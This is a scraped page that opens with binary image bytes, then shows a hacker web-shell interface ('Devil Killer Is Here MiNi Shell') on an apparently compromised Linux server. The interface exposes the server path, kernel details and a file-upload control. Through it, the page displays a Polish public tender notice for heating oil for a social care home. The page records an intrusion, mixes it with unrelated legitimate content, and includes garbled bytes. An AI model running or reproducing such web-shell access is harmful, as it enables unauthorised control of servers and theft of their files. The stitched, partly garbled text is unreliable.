JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211215/0031534002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i sukcesywna dostawa oleju opałowego na potrzeby Domu Pomocy Społecznej w Wierzbicy na rok 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ W WIERZBICY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dom Pomocy Społecznej w Wierzbicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000310410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sienkiewicza 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wierzbica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-680</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dps.wierzbica@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpswierzbica.finn</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i sukcesywna dostawa oleju opałowego na potrzeby Domu Pomocy Społecznej w Wierzbicy na rok 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-39dc387d-5d3b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00315340</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009515/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup i dostawa oleju opałowego na potrzeby Domu Pomocy Społecznej w Wierzbicy na rok 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://dspwierzbica.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://dspwierzbica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">WYMAGANIA TECHNICZNE I ORGANIZACYJNE WYSYŁANIA I ODBIERANIA KORESPONDENCJI<br/>ELEKTRONICZNEJ PRZEKAZYWANEJ PRZY ICH UŻYCIU OPISANE ZOSTAŁY W REGULAMINIE<br/>KORZYSTANIA Z PLATFORMY ZAKUPOWEJ ZAMAWIAJĄCEGO MARKETPLANET POD<br/>ADRESEM https://oneplanet.pl/regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych uzyskanych w<br/>związku z postępowaniem o udzielenie zamówienia publicznego jest Dom Pomocy Społecznej w<br/>Wierzbicy, reprezentowany przez Dyrektor Małgorzatę Borcuch, pod adresem: 26-680 Wierzbica, ul.<br/>Sienkiewicza 37, tel. 48 618 20 59, email: dps.wierzbica@gmail.com<br/>2. W sprawach związanych z przetwarzaniem danych osobowych można kontaktować się z<br/>Inspektorem Ochrony Danych, za pośrednictwem adresu e-mail: kontakt.iod@gmail.comDane<br/>osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego pn. Dostawa artykułów spożywczych do DPS w Wierzbicy w 2022r.<br/>1) Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego, zgodnie z wymaganiami określonymi w ustawie z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 ze zm.), a następnie zawarcia umowy z wybranym wykonawcą, jej realizacji oraz rozliczenia,;<br/>2) podstawą przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b) i c) ogólnego<br/>rozporządzenia o ochronie danych z dnia 27 kwietnia 2016 r., tj. przetwarzanie jest niezbędne do<br/>wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie<br/>osoby, której dane dotyczą, przed zawarciem umowy oraz przetwarzanie jest niezbędne do<br/>wypełnienia obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych;<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 74 ustawy Pzp, a także art. 6 ustawy z 6<br/>września 2001 r. o dostępie do informacji publicznej. 4) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z w/w ustawy;<br/>5) posiada Pani/Pan prawo do:<br/>• żądania dostępu do treści swoich danych osobowych, ich sprostowania lub ograniczenia<br/>przetwarzania,<br/>• wniesienia skargi do organu nadzorczego - Prezesa Urzędu Ochrony Danych Osobowych;<br/>6) nie przysługuje Pani/Panu<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>7) Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu;<br/>8) Pani/Pana Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane<br/>przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. informujemy iż: w<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu. skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.271.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa oleju opałowego grzewczego, otrzymywanego <br/>z produktów przeróbki ropy naftowej w ilości 90 000 litrów do dwóch kotłowni Domu Pomocy Społecznej w Wierzbicy: jedna na ul. Sienkiewicza 37, druga – ul. Partyzantów 3.<br/>2.	Wymagane parametry oleju opałowego, zgodnie z parametrami określonymi wg normy PN-C-99024 gatunek L-l oraz w Rozporządzeniu Ministra Gospodarki z dnia 1 grudnia 2016r. w sprawie wymagań jakościowych dotyczących zawartości siarki dla olejów oraz rodzajów instalacji i warunków, w których będą stosowane oleje opałowe (Dz.U. z 2016r., poz. 2008):<br/>•	Gęstość W temperaturze 15st. C - max 860 kg/m3;<br/>•	Temperatura zapłonu min. 56 st. C;<br/>•	Wartość opałowa min 42,6 MJ/kg:<br/>•	Lepkość kinematyczna w temperaturze 20 st. C max. 6 mm2/s;<br/>•	Temperatura płynięcia max - 20 st C;<br/>•	Pozostałość po koksowaniu - 10% pozostałości destylacyjnej max.0,3%(m/m);<br/>•	Zawartość siarki max 0,1% (m/m):<br/>•	Zawartość wody max 200 mg/kg;<br/>•	Zawartość zanieczyszczeń stałych max 24 mg/kg;<br/>•	Pozostałość po spopielaniu max 0,01% (m/m)<br/>•	Zawartość znacznika SY 124 6-9 mg/l;<br/>•	Zawartość barwnika S Red 19 min. 6,3 mg/l;<br/>•	Skład frakcyjny: do temperatury 250 st. C destyluje max 65 (V/V) <br/> do temperatury 350 st. C destyluje min. 85 (V/V)<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">5.1	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>5.2	Cena -waga 60 % = 60 pkt<br/>5.3	Termin realizacji dostawy waga 40%= 40 pkt<br/><br/>Ocena będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów (wartość punktowa oferty x wartość punktowa wagi), w następujący sposób:<br/>a) Kryterium „Cena”:<br/>Znaczenie kryterium „Cena” (C) – 60% (najkorzystniejsza spośród ofert może otrzymać <br/>maksymalnie 60 pkt. w tym kryterium). Ocenie podlegać będzie całkowity koszt realizacji <br/>Zamówienia - uwzględniający wszelkie niezbędne prace i czynności. Cena podawana jest <br/>przez Wykonawcę w Formularzu Oferty. <br/><br/>Dla kryterium „Cena” punkty zostaną obliczone wg wzoru:<br/><br/>C = Cmin/Cb x 60 pkt <br/><br/>gdzie: C min – cena brutto oferty najtańszej<br/>C o – cena brutto oferty ocenianej<br/><br/>UWAGA: Wynik będzie zaokrąglany do dwóch miejsc po przecinku.<br/><br/>b)	Kryterium „Termin realizacji dostawy”:<br/><br/>Oceny kryterium „Termin realizacji” (T) – 40 % dokonuje się w następujący sposób:<br/>Ocenie zostanie poddana długość zaproponowanego przez Wykonawcę terminu, w którym <br/>każdorazowo następować będzie realizacja dostaw oleju opałowego lub ekogroszku <br/>(pojedynczych zamówień) licząc od momentu złożenia zamówienia. Maksymalnie można <br/>uzyskać 40 punktów. Liczba przyznanych punktów dla poszczególnych ofert będzie <br/>przyznawana według poniższych zasad:<br/><br/>Termin realizacji dostawy w godzinach* <br/>w ciągu 24 możliwa do uzyskania ilość punktów 40 <br/>w ciągu 48 możliwa do uzyskania ilość punktów 30 <br/>w ciągu 72 możliwa do uzyskania ilość punktów 20<br/>w ciągu 96 możliwa do uzyskania ilość punktów 10<br/>w ciągu 120 możliwa do uzyskania ilość punktów 0<br/> <br/>UWAGA: * Termin realizacji dostaw powinien zostać podany w godziach, przy czym <br/>Wykonawca nie może zaproponować godzim innych niż wskazane w tabeli powyżej. <br/>Kryterium będzie rozpatrywane na podstawie oświadczenia złożonego przez Wykonawcę <br/>w Formularzu oferty.<br/>5.4. Zamawiający zsumuje wszystkie punkty przyznane poszczególnym ofertom na podstawie zastosowanych kryteriów oceny ofert (wg wzoru) i wybierze ofertę <br/>najkorzystniejszą (o najwyższej liczbie zsumowanych punktów)<br/>K = C + T<br/>gdzie:<br/>K – ogólna liczba punktów, jaką może otrzymać oferta (Wykonawca)<br/>C – liczba punktów, jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>R – liczba punktów, jaką może zdobyć Wykonawca za kryterium „Termin realizacji <br/>dostawy”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy w godzinach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1.	ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM:<br/>Zamawiający nie określa warunków w ww. zakresie. <br/><br/>2.	UPRAWNIEŃ DO PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW:<br/>Wykonawca musi wykazać posiadanie aktualnej koncesji* w zakresie obrotu paliwami płynnymi objętymi niniejszym zamówieniem. * w rozumieniu ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz.U. 2021 poz. 716 z późn. zm.)<br/><br/>3.	SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ:<br/>Zamawiający nie określa warunków w ww. zakresie. <br/><br/>4.	ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ: <br/>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał zamówienia odpowiadające swoim przedmiotem dostawom będącym przedmiotem niniejszego zamówienia, <br/>	dostarczył w ramach jednej umowy lub zamówienia olej opałowy o łącznej ilości minimum 25 000 litrów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.3.1	potwierdzających brak podstaw wykluczenia:<br/>a)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), <br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>b)	o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/> w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wg Załącznika nr 4;<br/>c)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (Zamawiający pobierze samodzielnie z ogólnodostępnych rejestrów Wykonawca nie musi załączać do dokumentów na wezwanie)<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego Rejestru Sądowego lub <br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej– składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>d)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust 1 pkt 1 i 2 ustawy Pzp<br/>b)	art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne.<br/>c)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>d)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	art. 109 ust. 1 pkt 4 ustawy Pzp - wg załącznika 9 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu doświadczenia; wykaz wykonanych dostaw w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane wraz z załączeniem dowodów określających czy zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy, <br/>w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające wykonywanie usług powinny być wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert. załącznik nr 3.<br/><br/>b)	na potwierdzenia uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Wykonawca musi wykazać posiadanie aktualnej koncesji* w zakresie obrotu paliwami płynnymi objętymi niniejszym zamówieniem. * w rozumieniu ustawy <br/>z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz.U. 2021 poz. 716 z późn. zm.)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązania 